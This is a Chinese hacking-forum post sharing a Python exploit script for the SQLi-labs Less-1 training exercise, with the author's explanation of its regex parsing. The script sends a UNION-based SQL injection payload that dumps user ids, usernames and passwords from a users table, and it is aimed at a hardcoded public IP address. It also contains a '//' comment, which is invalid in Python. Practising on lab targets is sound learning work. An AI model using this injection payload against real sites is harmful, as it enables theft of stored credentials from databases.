跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Sql-lab-Less-1 Exp编写

HACK1949
HACK1949
交流中心

精选回复

发布于

唉……谈起代码,还是太菜了,晚上写了下exp。

附上代码:

#coding:utf-8
import urllib.request
import re

def get_page(url):
	payload='?id=-1%27union+select+1,group_concat("[",id,"_",username,"_",password,"]"),3+from+users--+'
	req = urllib.request.Request(url+payload,method='GET')
	response = urllib.request.urlopen(req)
	page = response.read().decode('utf-8')  //读取网页源代码
	
	return page
	
def exploit(url):
	html = get_page(url)
	m=re.compile(".*?>Your Login name:(.*?)
.*?",re.S)
	try:
		lt=m.findall(html)
		list=lt[0].split(',')
		for i in list:
			print(i,end='\n')
	except:
		print("Error!")

		
url = 'http://43.247.91.228:84/Less-1/'
exploit(url)

re.S将字符串作为整体进行正则匹配,不加可能会出错。

(.*?)是我们要匹配的内容。

complie制定正则的规则m,findall再以规则m去源代码中进行正则匹配。

list=lt[0].split(',')
for i in list:
    print(i,end='\n')

lt[0]获取lt列表第一个位置元素,并将0位置元素以“,” 分割,最后送入新list列表中。

接着,循环遍历输出列表中的值,并且每一个值,以回车作为结尾,便得到了我们要的结果。

a022648925d6576.png

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。